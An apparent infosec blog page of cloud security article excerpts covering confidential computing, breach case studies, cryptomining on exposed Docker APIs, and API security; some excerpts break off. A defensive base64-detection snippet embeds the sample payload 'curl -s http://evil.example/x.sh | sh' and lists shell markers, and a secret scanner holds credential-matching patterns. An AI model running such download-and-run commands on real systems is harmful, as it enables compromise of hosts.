Cloud Security Titles
Cloud Security Training
MicroMasters® Program in Cloud Computing
Full Stack Cloud Application Development
AWS – Getting Started with Cloud Security
Infosec books | InfoSec tools | InfoSec services
Dec 23 2022
Nov 07 2022
Some of the biggest barriers to cloud adoption are security concerns: data loss or leakage, and the associated legal and regulatory concerns with storing and processing data off-premises.
In the last 18 months, 79% of companies have experienced at least one cloud data breach; even more alarmingly, 43% have reported 10 or more breaches in that time. Despite the clear advantages of cloud infrastructure, one of the main challenges that often gets overlooked is the need to (1) trust that the infrastructure will be secure enough against threats and (2) trust that the chosen cloud provider won’t purposefully or inadvertently access the data processed on its infrastructure. When dealing with highly sensitive or confidential data (such as banking information or healthcare patient data), this becomes a major concern and a barrier to further cloud adoption.
Traditional approaches for protecting data have relied upon implementing access controls and policies and encrypting data at rest and in transit, but none are able to prevent the threat in its entirety because a fundamental challenge remains: keeping data encrypted when in use, while it is being processed. Confidential computing – projected to be a $54B market by 2026 – is emerging as a way to remove the need for trusting infrastructure and service providers by keeping data protected/encrypted even when in use.
Confidential computing technology uses hardware-based techniques to create isolated environments called enclaves (also known as Trusted Execution Environments or TEEs).
Code and data within enclaves are inaccessible to other applications, users, or processes colocated on the system. The enclave keeps the data encrypted even when in use, both in memory and during computation. With a secure enclave environment, multiple parties can collaborate on analytics and AI use cases without compromising the confidentiality of their individual data or exposing it to other parties.
According to a recent survey, using secure enclaves in the enterprise setting is attractive for implementing safeguards for the following scenarios:
If these scenarios apply to you and your business, but you’re unsure what you’ll need to know to get started, here are five questions to ask your CISO:
Confidential computing technology is now available on all major cloud providers, so organizations no longer need to procure and maintain specialized hardware themselves. Even though confidential computing and secure enclaves are still in the “emerging technology” bucket, organizations can easily adopt confidential computing through cloud vendors and ISVs. The cloud providers see the benefit of secure enclaves and their future potential as a transformative technology, and have bought in accordingly.
Some confidential computing technologies, such as Intel SGX, require application modifications before they can run within enclaves. Other technologies, such as Confidential VMs, provide more flexibility and can run unmodified applications.
But, from a security perspective, this has the downside of having to trust the entire software stack within the VM. So, depending on the use case and requirements, one technology may be preferable over the other. In addition, proper adoption of confidential computing requires orchestrating management of the other constituent technologies, such as remote attestation.
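The remote attestation mentioned above can be pictured with a toy sketch. This is not a real SGX or SEV flow; the shared HMAC key stands in for the hardware root of trust, and all names and values are illustrative.

```python
import hashlib
import hmac

# Toy sketch of remote attestation: the verifier checks that the enclave's
# reported code measurement matches a known-good value, and that the report
# is authenticated. Real hardware attestation uses vendor-rooted signatures;
# the shared HMAC key here merely stands in for that root of trust.

ENCLAVE_CODE = b"def process(data): return analyze(data)"
EXPECTED_MEASUREMENT = hashlib.sha256(ENCLAVE_CODE).hexdigest()
HARDWARE_KEY = b"stand-in-for-hardware-root-of-trust"

def make_report(code: bytes) -> dict:
    """What the 'enclave' sends to a remote verifier."""
    measurement = hashlib.sha256(code).hexdigest()
    mac = hmac.new(HARDWARE_KEY, measurement.encode(), hashlib.sha256).hexdigest()
    return {"measurement": measurement, "mac": mac}

def verify_report(report: dict) -> bool:
    """Remote verifier: authenticate the report, then compare measurements."""
    expected_mac = hmac.new(HARDWARE_KEY, report["measurement"].encode(),
                            hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected_mac, report["mac"]):
        return False  # report was forged or tampered with
    return report["measurement"] == EXPECTED_MEASUREMENT

report = make_report(ENCLAVE_CODE)
print(verify_report(report))                        # genuine enclave
print(verify_report(make_report(b"patched code")))  # modified code fails
```

Only a workload whose measurement matches the expected value passes, which is the property that lets a remote party decide whether to release secrets to the enclave.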
The enclave adoption process can be complex and engineering teams will have to take time to build these capabilities to get their applications up and running. While bandwidth may be tight at times, the ROI is worth it in the long run. A growing ISV ecosystem can also help in the seamless adoption of confidential computing for a rich variety of use cases.
Before data can be shared with other teams, organizations typically need to follow a cumbersome governance process to restrict access to sensitive data, eliminate data sets or mask specific data fields, and prevent any level of data sharing.
Integrating secure enclaves provides an opportunity for organizations to increase both productivity and security measures. Multiple data owners can individually encrypt their entire data (including PII), pool it together, and analyze the collective data set within enclaves. Done effectively, multi-party collaboration can drive faster business results by enabling new and higher-quality insights.
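As a rough illustration of the multi-party property (not a real enclave workflow), each owner can mask its value so that the pooled inputs reveal only the aggregate. In an actual deployment the decryption and analysis would happen inside an attested enclave; the additive masking and all values below are made up for illustration.

```python
import secrets

# Toy sketch: each data owner masks its value so the pooled shares reveal
# nothing individually, while an aggregate can still be computed. In a real
# system the pads would be provisioned to a hardware enclave over attested,
# encrypted channels, and the analysis would run inside it.

MODULUS = 2**61 - 1  # large prime; all arithmetic is done mod this value

def mask(value: int) -> tuple[int, int]:
    """Split a value into a random pad (kept secret) and a masked share."""
    pad = secrets.randbelow(MODULUS)
    return pad, (value + pad) % MODULUS

# Three hypothetical data owners with sensitive values.
values = [120, 450, 75]
pads, shares = zip(*(mask(v) for v in values))

# The "enclave" combines the masked shares and removes the pads, exposing
# only the aggregate, never any single party's input.
aggregate = (sum(shares) - sum(pads)) % MODULUS
print(aggregate)
```

No party ever sees another party’s plaintext, yet the combined result is exact, which is the collaboration pattern enclaves enable at full application scale.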
Implementing confidential computing workflows can be difficult to do directly without using existing tools and software. One needs to make sure that confidential data is protected throughout its lifecycle. This can have a variety of moving parts – from integrating with existing key management systems to managing secure enclave infrastructure, rewriting applications, deploying code securely and verifiably to the enclaves, and keeping confidential data encrypted in storage and in transit in/out of the enclaves. However, there is a rich emerging ISV ecosystem of software that alleviates the complexities of confidential computing for a rich variety of use cases, making it easy to use and adopt by non-experts.
The top CPU vendors all introduced secure enclave and confidential computing solutions in recent years. These were adopted by the leading cloud vendors, some of which now offer solutions based on the same underlying technology. Microsoft Azure and Google Cloud Platform, for example, offer solutions based on AMD’s SEV technology. As software solutions running on top of these cloud platforms evolve, application vendors will introduce cross-platform solutions powered by the common hardware layers.
Businesses considering cloud adoption can do so more confidently with secure enclaves. By asking their CISO these five questions, businesses can move into the future, understand what implementing secure enclaves will look like, better secure their data, and create a more efficient analytics process.
This ongoing shift to the cloud will increase efficiency for companies and reduce human error – especially knowing 57% of businesses will move their workloads to the cloud before the end of the year. When secure enclaves are implemented properly, the crucial component of ensuring security is not sacrificed. All businesses working with data should consider integrating confidential computing into their models to allow for analytics and AI on encrypted data.
Secure Processors Part I: Background, Taxonomy for Secure Enclaves and Intel SGX Architecture
Aug 31 2022
While cloud breaches are going to happen, that doesn’t mean we can’t do anything about them. By better understanding cloud attacks, organizations can better prepare for them.
Cloud breaches are inevitable.
It’s the reality we live in. The last few years have demonstrated that breaches occur, no matter how much security organizations put in place. The increased complexity of organizations — where a single mistake or vulnerability can lead to a compromise — coupled with the increased motivation, sophistication, and dedication of attackers, means breaches are here to stay. At the same time, organizations are transitioning to the cloud, making attackers shift focus to rapidly increase their attacks on cloud environments.
While this means that cloud breaches are inevitable, that doesn’t mean we can’t do anything about them. By better understanding cloud attacks, organizations can better prepare for them. Then, hopefully, they can contain and respond to attacks faster, reducing their impact and averting a crisis.
This two-part series will explore real-world attacks as they unravel, investigate what happened, and share insights on practical ways organizations can respond to cloud attacks in today’s threat landscape.
In the last few years, software-as-a-service (SaaS) platforms have been replacing traditional enterprise applications, making it easier for organizations to adopt and manage them. Part of the value such platforms provide is the ability to integrate and expand rapidly, supporting the ever-growing demands of users for more functionality. Further enhancing their platforms, SaaS vendors are creating a marketplace to allow third-party providers to add functionality and integration for its users. These marketplaces, however, can introduce substantial third-party risk, as can be seen in the following scenario.
When GitHub notified a company of a potential risk, it didn’t provide any specific indicators of unauthorized access. Instead, GitHub issued only a generic notice that DeepSource, one of the marketplace apps the company had previously been using, was breached, making it hard to tell whether the organization was affected. An initial review of the company’s GitHub logs did not help, as it showed no access to its code by DeepSource.
The reason for this was rather simple — and it is at the heart of how many SaaS marketplaces operate. A few months before the breach, one of the company’s developers tried out the DeepSource app, wherein the developer granted DeepSource access to the code under his username. When the attackers used DeepSource’s access to download the entire code repository, what appeared in the logs was a pull request under the name of a legitimate user. The only indicator that it was malicious was the identification of an irregular IP address, which eventually was tied to other known attacks.
At this point, it became clear that the entire code repository had been stolen, and a full-blown response was needed to contain and recover from the breach. As with most code leakage cases, the immediate concern was access to secrets (passwords and keys) in the code. While hardcoding secrets is generally considered bad practice, it remains common, and this case was no different. By identifying the relevant secrets in the code, the company was able to predict the attackers’ next steps, which, as expected, involved accessing some of its Amazon Web Services (AWS) infrastructure. By quickly identifying those resources, the company blocked access to them, contained the breach, and recovered before more damage could be done.
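A minimal sketch of the kind of secret scanning that helps in such a response, assuming illustrative patterns (an AWS-style access key ID and generic credential assignments); real scanners such as git-secrets or truffleHog use far larger rule sets plus entropy analysis:

```python
import re

# Illustrative rules only: an AWS-style access key ID, and a generic
# "password/secret/api_key = '...'" assignment with a long literal value.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "generic_assignment": re.compile(
        r"(?i)\b(password|secret|api[_-]?key|token)\s*[:=]\s*['\"][^'\"]{8,}['\"]"),
}

def scan(source: str) -> list[tuple[int, str]]:
    """Return (line_number, rule_name) for every suspicious line."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, name))
    return hits

sample = '''\
db_host = "db.internal"
aws_key = "AKIAIOSFODNN7EXAMPLE"
password = "hunter2hunter2"
'''
print(scan(sample))
```

Running a scanner like this over a repository before an incident, rather than during one, shortens the list of credentials that must be rotated after a leak.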
What if one could mine cryptocurrency at somebody else’s expense? This idea is at the heart of many cryptomining attacks we see today, where attackers take over cloud resources and run cryptominers on them, collecting cryptocurrency while the hacked organization pays the cloud compute bills.
In a recent incident, a company identified unknown files on 18 AWS EC2 machines it was running in the cloud. Looking at the files, it became clear the company had fallen victim to the ongoing TeamTNT Watchdog cryptomining campaign. It was initially unclear how the attackers managed to infect so many EC2 instances, but as the investigation unfolded, it became apparent that instead of targeting individual machines, the attackers had targeted the Amazon Machine Image (AMI) template used to create each machine. During the creation of the original image, there was a short window in which a service was misconfigured, allowing remote access. TeamTNT used automated tools to scan the network, identify the exposed service, and immediately plant the miners, which then got duplicated to every new machine created from the image.
This highlights another common attack pattern: implanting cryptominers in publicly available AMIs through the Amazon marketplace.
As demonstrated by these cases, cloud attacks are here to stay. They’re different from what we’re used to observing, so it’s time to better prepare for their arrival. Stay tuned for part two, where we will dive into cloud ransomware and how to avoid it.
Jul 27 2022
Alkira today announced it has integrated its cloud service for connecting multiple networks with firewalls from Fortinet.
Announced at the AWS re:Inforce event, the integration makes it possible to automate the configuration and deployment of Fortinet firewalls via the FortiManager platform using a control plane that integrates with the networking services provided by multiple cloud service providers.
Ahmed Datoo, chief marketing officer for Alkira, said the alliance with Fortinet is in addition to existing support for firewalls from Palo Alto Networks.
Alkira is making a case for a control plane for cloud networking that integrates with the application programming interfaces (API) exposed by various cloud service providers. As a result, there is no need for an IT team to deploy agent software on each cloud service to integrate the Alkira service, noted Datoo.
As organizations increasingly deploy workloads across multiple clouds, managing and securing each of the networks that cloud service providers give them access to has become challenging. The Alkira platform is designed to provide a single pane of glass for configuring networking and security services spanning multiple clouds, said Datoo. Those organizations can either use the frameworks provided by vendors such as Fortinet to manage individual elements or use an instance of the open source Terraform tool to programmatically invoke services, he noted.
The challenge organizations face when using multiple clouds is that each one is typically managed in isolation. As a result, IT teams find themselves dedicating IT staff to mastering the various tools required to manage these platforms. Over time, however, the total cost of IT starts to rise as each cloud platform is added to the extended enterprise. Alkira reduces those costs by unifying the provisioning and management of multiple cloud networks, said Datoo. It’s up to each IT organization to decide which cloud platform to use to deploy the Alkira platform to accomplish that goal, he added.
The alliance between Alkira and Fortinet is only the latest example of the convergence of network and security operations. While cybersecurity teams are still needed to define security policies, much of the routine management of firewalls and other security platforms is now handled by network operations—in part, to make up for the chronic shortage of cybersecurity personnel. Network operations, meanwhile, are slowly being integrated with other IT operations workflows to enable organizations to programmatically manage entire IT environments without requiring as many dedicated network specialists.
In the meantime, the attack surface that security teams are being asked to secure continues to expand in the age of the cloud. The issue, of course, is that the size of most organizations’ security teams remains constrained. The only way to secure all those cloud environments at scale is to rethink the entire approach to security operations. In most cases, those approaches were defined in an era when most workloads were deployed in on-premises IT environments that were comparatively simple to secure.
May 06 2022
The Uptycs Threat Research team has identified ongoing malicious campaigns through our Docker honeypot targeting the exposed Docker API port 2375. The attacks involve crypto miners and reverse shells planted on the vulnerable servers using base64-encoded commands in the cmdline, crafted to evade defense mechanisms. This article briefly discusses three types of attacks that we have observed lately in our Docker honeypot.
The coinminer attack chain involves several shell scripts to drop malicious components via deployment of legitimate Docker images on the vulnerable servers (the servers exposed to Docker API).
The threat actors tried to run the Alpine Docker image with chroot command to gain full privileges on the vulnerable server host (a common misconfiguration). The attacker passed curl utility as an argument to the Alpine image which downloads and runs the malicious shell script (hash:
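A hedged sketch of how defenders might surface base64-encoded commands like these in process cmdlines; the shell markers and sample cmdline below are illustrative, not the actual campaign payload:

```python
import base64
import binascii

# Heuristic: try to decode long base64-looking tokens in a cmdline and flag
# any that decode to shell-like text. Marker strings are illustrative.
SHELL_MARKERS = ("curl ", "wget ", "chroot ", "| sh", "| bash", "/tmp/")

def decoded_shell_commands(cmdline: str) -> list[str]:
    """Return decoded payloads from base64 tokens that look like shell commands."""
    findings = []
    for token in cmdline.split():
        if len(token) < 16:
            continue  # too short to be an interesting encoded payload
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or decodes to binary
        if any(marker in decoded for marker in SHELL_MARKERS):
            findings.append(decoded)
    return findings

payload = base64.b64encode(b"curl -s http://evil.example/x.sh | sh").decode()
print(decoded_shell_commands(f"/bin/sh -c {payload}"))
```

A rule like this is noisy on its own, but combined with the source (a container spawned via an exposed Docker API) it gives responders a readable version of what the attacker actually ran.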
May 04 2022
Role Based Access Control in Cloud Computing: Role Based Access Control Using Policy Specification and Ontology on Clouds
Apr 12 2022
In this video for Help Net Security, Paul Calatayud, CISO at Aqua Security, talks about cloud native security and the problem with the lack of understanding of risks to this environment.
A recent survey of over 100 cloud professionals revealed that businesses often lead the charge in the cloud: they see the opportunity and move forward, but as more and more critical compute finds its way into these cloud environments, the security teams start to take notice. Often too late, though.
The survey shows that lack of awareness is becoming a problem and that the risks are not fully understood. Organizations need to get ahead of these things: to apply a good cloud native security strategy, understanding the risks is imperative.
Securing DevOps: Security in the Cloud
Feb 02 2022
Access Control Management in Cloud Environments
Jan 14 2022
The threats are constantly shifting, subject to trends in cryptocurrency use, geopolitics, the pandemic, and many other things; for this reason, a clear sense of the landscape is essential. Below, you’ll find a quick guide to some of the most pressing threats of the coming year.
For threat actors, there is a simple calculus at play – namely, what method of attack is a) easiest and b) most likely to yield the biggest return? And the answer, at this moment, is Linux-based cloud infrastructure, which makes up 80%+ of the total cloud infrastructure. With cloud adoption increasing because of the pandemic, this has the potential to be a massive problem.
In just the last few months, ransomware gangs like BlackMatter, HelloKitty, and REvil have been observed targeting Linux via ESXi servers with ELF encryptors. And we have recently seen the PYSA ransomware gang adding Linux support. Meanwhile, experts are identifying new and increasingly complex Linux malware families, which adds to the already-mounting list of concerns. Working pre-emptively against these threats is more essential than ever.
Building a Future-Proof Cloud Infrastructure
Jan 08 2022
With great power comes great responsibility, and CIOs (Chief Information Officers) are no different. Technology is always changing, and keeping up with those changes is a difficult job. CIOs are expected to be aware of, and have a detailed understanding of, major IT industry trends, new technologies, and IT best practices that could benefit the organization.
In the current scenario, cloud computing dominates the market. So, what are the interesting cloud computing facts that every CIO should be aware of in 2022? How many did you know before landing here? Let’s discuss them in detail.
Table of Content
Introduction to Cloud Computing
Jan 03 2022
At the end of the year, gaming giant SEGA Europe inadvertently left users’ personal information publicly accessible in an Amazon Web Services (AWS) S3 bucket, cybersecurity firm VPN Overview reported.
The unsecured S3 bucket contained multiple sets of AWS keys that could have allowed threat actors to access many of SEGA Europe’s cloud services, along with MailChimp and Steam keys that allowed access to those services in SEGA’s name.
“Researchers found compromised SNS notification queues and were able to run scripts and upload files on domains owned by SEGA Europe. Several popular SEGA websites and CDNs were affected.” reads the report published by VPN Overview.
The unsecured S3 bucket could potentially also grant access to user data, including information on hundreds of thousands of users of the Football Manager forums at community.sigames.com.
Below is the list of bugs in SEGA Europe’s Amazon cloud reported by the company:
| FINDING | SEVERITY |
| --- | --- |
| Steam developer key | Moderate |
| RSA keys | Serious |
| PII and hashed passwords | Serious |
| MailChimp API key | Critical |
| Amazon Web Services credentials | Critical |
Set up a virtual lab and pentest major AWS services, including EC2, S3, Lambda, and CloudFormation
Dec 06 2021
Security and Privacy Preserving for IoT and 5G Networks: Techniques, Challenges, and New Directions
Related articles:
The Best & Worst States in America for Online Privacy
Wireless Wars: China’s Dangerous Domination of 5G
Nov 26 2021
Practical Cloud Security: A Guide for Secure Design and Deployment
MicroMasters® Program in Cloud Computing
Oct 15 2021
“Today’s hyper-targeted spear phishing attacks, coming at users from all digital channels, are simply not discernable to the human eye. Add to that the increasing number of attacks coming from legitimate infrastructure, and the reason phishing is the number one thing leading to disruptive ransomware attacks is obvious.”
People connect with work, family, and friends through apps and browsers. Cybercriminals are taking advantage of this by attacking outside of email, through less protected channels like SMS text, social media, gaming, collaboration tools, and search apps.
Spear phishing and human hacking from legitimate infrastructure increased in August 2021: 12% (or 79,300) of all malicious URLs identified came from legitimate cloud infrastructure, including AWS, Azure, outlook.com, and sharepoint.com, giving cybercriminals the opportunity to easily evade current detection technologies.
Sep 30 2021
Misconfigurations in software development environments and poor security hygiene in the supply chain can impact cloud infrastructure and offer opportunities for malicious actors to control unwitting victims’ software development processes.
These were the results of a report from Palo Alto Networks’ security specialist Unit 42, which conducted a red team exercise with a large SaaS provider.
Within three days, the researchers discovered critical software development flaws that could have exposed the organization to an attack similar to those perpetrated against SolarWinds and Kaseya.
If an attacker (like an APT) compromises third-party developers, it’s possible to infiltrate thousands of organizations’ cloud infrastructures, the report warned.
Matt Chiodi, CSO of public cloud at Palo Alto Networks, explained that supply chain flaws in the cloud are difficult to detect because of the massive number of building blocks that go into even a basic cloud-native application.
“Our researchers estimated that the typical cloud-native application is built upon hundreds of these packages,” he said. “Let’s call them ‘Legos.’ Each of these Legos that developers plug into their application carries a certain risk and can be a vector to another supply chain attack.”
The report highlights how vulnerabilities and misconfigurations can quickly snowball within the context of the cloud software supply chain, and called for organizations to “shift security left.”
“Shifting security left is about moving security as close to development as possible,” said Chiodi. “Historically, security and development teams have operated independently of each other.” He added that development teams like to move quickly and try new things and security is more often the opposite.
“The concept of ‘shift left’ attempts to not change developer behaviors, but rather equip them with processes and tools that work natively to secure their existing methods of developing software,” Chiodi said. “If security teams can equip development teams with processes and tools that work natively with development tools and measure regularly, they greatly reduce their risks of supply chain insecurity from cloud-native applications. This is a good first step.”
He pointed out the first wave of migrations to the cloud was marked by “lift and shift,” meaning that organizations simply took existing applications as-is and moved them to the cloud.
“When they did this, they could say the applications were running in the cloud, but the applications themselves were not cloud-native,” he said.
Sep 17 2021
IBM Security Services today published a report detailing a raft of issues pertaining to cloud security, including the fact that there are nearly 30,000 cloud accounts potentially for sale on dark web marketplaces.
The report is based on dark web analysis, IBM Security X-Force Red penetration testing data, IBM Security Services metrics, X-Force Incident Response analysis and X-Force Threat Intelligence research.
The report found advertisements for tens of thousands of cloud accounts and resources for sale. Prices generally range from a few dollars to over $15,000 per account for access credentials depending on the amount of cloud resources that might be made accessible. On average, the price tag for cloud access rose an extra $1 for every $15 to $30 in credit the account held. Therefore, an account with $5,000 in available credit would be worth about $250, the report surmised.
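The reported rule of thumb can be sanity-checked with a few lines (a sketch of the arithmetic only; actual dark web prices vary widely):

```python
# Pricing rule of thumb reported above: roughly $1 of asking price
# per $15-$30 of credit an account holds.

def price_range(credit: float) -> tuple[float, float]:
    """Estimated (low, high) asking price for an account holding `credit`."""
    return credit / 30, credit / 15

low, high = price_range(5_000)
print(round(low), round(high))  # the range brackets the ~$250 the report cites
```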
In 71% of cases, threat actors offered access to cloud resources via the remote desktop protocol (RDP). X-Force Red found that 100% of their penetration tests into cloud environments in 2021 uncovered issues with either passwords or policy violations. Two-thirds of cloud breaches would likely have been prevented by more robust hardening of systems, such as properly implementing security policies and patching systems, the report noted.
More troubling still, IBM research indicates that vulnerabilities in cloud applications are growing: more than 2,500 have been disclosed to date, a 150% increase over the last five years. Almost half of those disclosed vulnerabilities were reported in the last 18 months.
The report also notes that two-thirds of the incidents analyzed involved improperly configured application programming interfaces (APIs), mainly misconfigured API keys that allowed improper access. API credential exposure through public code repositories frequently resulted in access to cloud environments as well, the report noted.
API Security in Action
Sep 16 2021
This, paired with the “anything you can do, I can do better” mantra adopted by today’s nation-state threat actors, has left mission-critical information vulnerable to attack as it undergoes the great cloud migration.
These agile threat actors – without any red tape to stand in their way – have already adopted a cloud-centric mindset, oftentimes at the expense of our national security. Meanwhile, emerging technologies like artificial intelligence and machine learning that lend themselves to assisting defensive efforts are rendered useless unless the defense community focuses more time, energy and resources on becoming cloud-centric.
Ultimately, the issue of national security hangs in the balance, and the best way to ensure we stay ahead of the curve is by using the cloud to “digitally overmatch” our opponents and unlock the full potential of digital transformation.
Originally coined by the Army, the concept of “digital overmatch” stems from the idea that the respective branches of the military can easily overwhelm their opponents on the ground due to their superior resources. Now, in the era of cyber-enabled conflict, this concept can also be applied to the non-Defense space. Given that data is such a strategic asset, defenders must ensure they can outpace and outmaneuver adversaries by using data-driven technologies such as the cloud, and deliver on-demand resources across all domains whenever and wherever they’re needed.
Without commercial and government innovation in cloud-native technology, federal agencies and the military are unable to maximize the full potential of their modernization strategy.
Cloud Computing Security: Foundations and Challenges
Aug 30 2021
All AWS Level 1 MSSP Competency Partners provide, at minimum, the ten 24/7 security monitoring, protection, and remediation services defined in the Level 1 Managed Security Services baseline. Those ten 24/7 services are listed below.
Many of the Level 1 MSSP Competency Partners also provide additional security assessment and implementation professional services to assist customers in their AWS cloud journey.
Aug 18 2021
While Security Orchestration, Automation and Response (SOAR) solutions help automate and structure these activities, the activities themselves require telemetry data that provides the breadcrumbs to help scope, identify, and potentially remedy the situation. This takes on increased significance in the cloud for a few reasons:
When incidents occur, the ability to quickly size up the scope, impact and root cause of the incident is directly proportional to the availability of quality data, and its ability to be easily queried, analyzed, and dissected. As companies migrate to the cloud, logs have become the de-facto standard of gathering telemetry.
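As a small illustration of querying log telemetry during such an investigation (with made-up field names and sample records, not any provider's real schema):

```python
import json

# Sketch: filter JSON audit log lines for access from outside an
# allowlisted network, the kind of query that surfaced the irregular
# IP in the marketplace breach described earlier.
TRUSTED_PREFIXES = ("10.", "192.168.")

def suspicious_events(log_lines):
    """Yield parsed events whose source IP falls outside the trusted ranges."""
    for line in log_lines:
        event = json.loads(line)
        if not event["source_ip"].startswith(TRUSTED_PREFIXES):
            yield event

logs = [
    '{"user": "dev1", "action": "git.pull", "source_ip": "10.0.4.7"}',
    '{"user": "dev1", "action": "git.clone", "source_ip": "185.220.101.4"}',
]
for event in suspicious_events(logs):
    print(event["user"], event["action"], event["source_ip"])
```

The point is less the filter itself than the prerequisite: queries like this are only possible when the logs were being collected, structured, and retained before the incident.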
The challenges when relying almost exclusively on logs for telemetry
This book is designed for security and risk assessment professionals, DevOps engineers, penetration testers, cloud security engineers, and cloud software developers who are interested in learning practical approaches to cloud security. It covers practical strategies for assessing the security and privacy of your cloud infrastructure and applications, and shows how to secure your cloud infrastructure against threats, attacks, and data breaches. The chapters are designed with a granular framework, starting with security concepts, followed by hands-on assessment techniques based on real-world studies, and concluding with recommendations, including best practices.
FEATURES:
Aug 06 2021
By 2022, API abuses will become the most frequent attack vector, predicts Gartner. We’re already witnessing new API exploits reach the headlines on a near-daily basis. Most infamous was the Equifax breach, an attack that exposed 147 million accounts in 2017. Since then, many more API breaches and major vulnerabilities have been detected at Experian, Geico, Facebook, Peloton, and other organizations.
So, why are API attacks suddenly becoming so prevalent? Well, several factors are contributing to the rise in API exploits. As I’ve covered before, the use of RESTful web APIs is becoming more widespread through digital transformation initiatives and SaaS productization. And, the data these touchpoints transmit can carry a hefty price tag. Unfortunately, cybersecurity has not sufficiently progressed, making APIs ripe for the hacker’s picking.
I recently met with Roey Eliyahu, CEO of Salt Security, to better understand why more and more API hacks are making headlines. According to Eliyahu, a general lack of security awareness means these integration points are a low-effort, high-reward attack target. Establishing protection against zero-day threats means increasing the visibility of API holdings, testing for broken authorization, and instituting ongoing monitoring of runtime environments.
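Testing for broken authorization can be pictured with a toy object-level check; a real test suite would issue HTTP requests against a staging API, and the in-memory store and record names here are purely illustrative:

```python
# Toy illustration of a broken-object-level-authorization (BOLA) test:
# request an object as a user who doesn't own it and confirm the API
# refuses. A vulnerable endpoint would return the record unconditionally.

RECORDS = {
    "alice": {"account": "alice", "balance": 1200},
    "bob": {"account": "bob", "balance": 3400},
}

def get_record(requesting_user: str, record_id: str) -> dict:
    """Object-level authorization: users may fetch only their own record."""
    if requesting_user != record_id:
        raise PermissionError(f"{requesting_user} may not read {record_id}")
    return RECORDS[record_id]

# The BOLA test: own record succeeds, someone else's must be rejected.
assert get_record("alice", "alice")["balance"] == 1200
try:
    get_record("alice", "bob")
    print("VULNERABLE: cross-user read allowed")
except PermissionError:
    print("ok: cross-user read refused")
```

The same pattern scales to real APIs: enumerate object IDs with a second user's credentials and treat any 200 response for someone else's object as a finding.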
Below, I’ll review the top factors contributing to the rise in API exploits. We’ll explore some of the top reasons why API attacks are increasing and consider how a zero-day protection mindset can mitigate common API vulnerabilities.
API Security in Action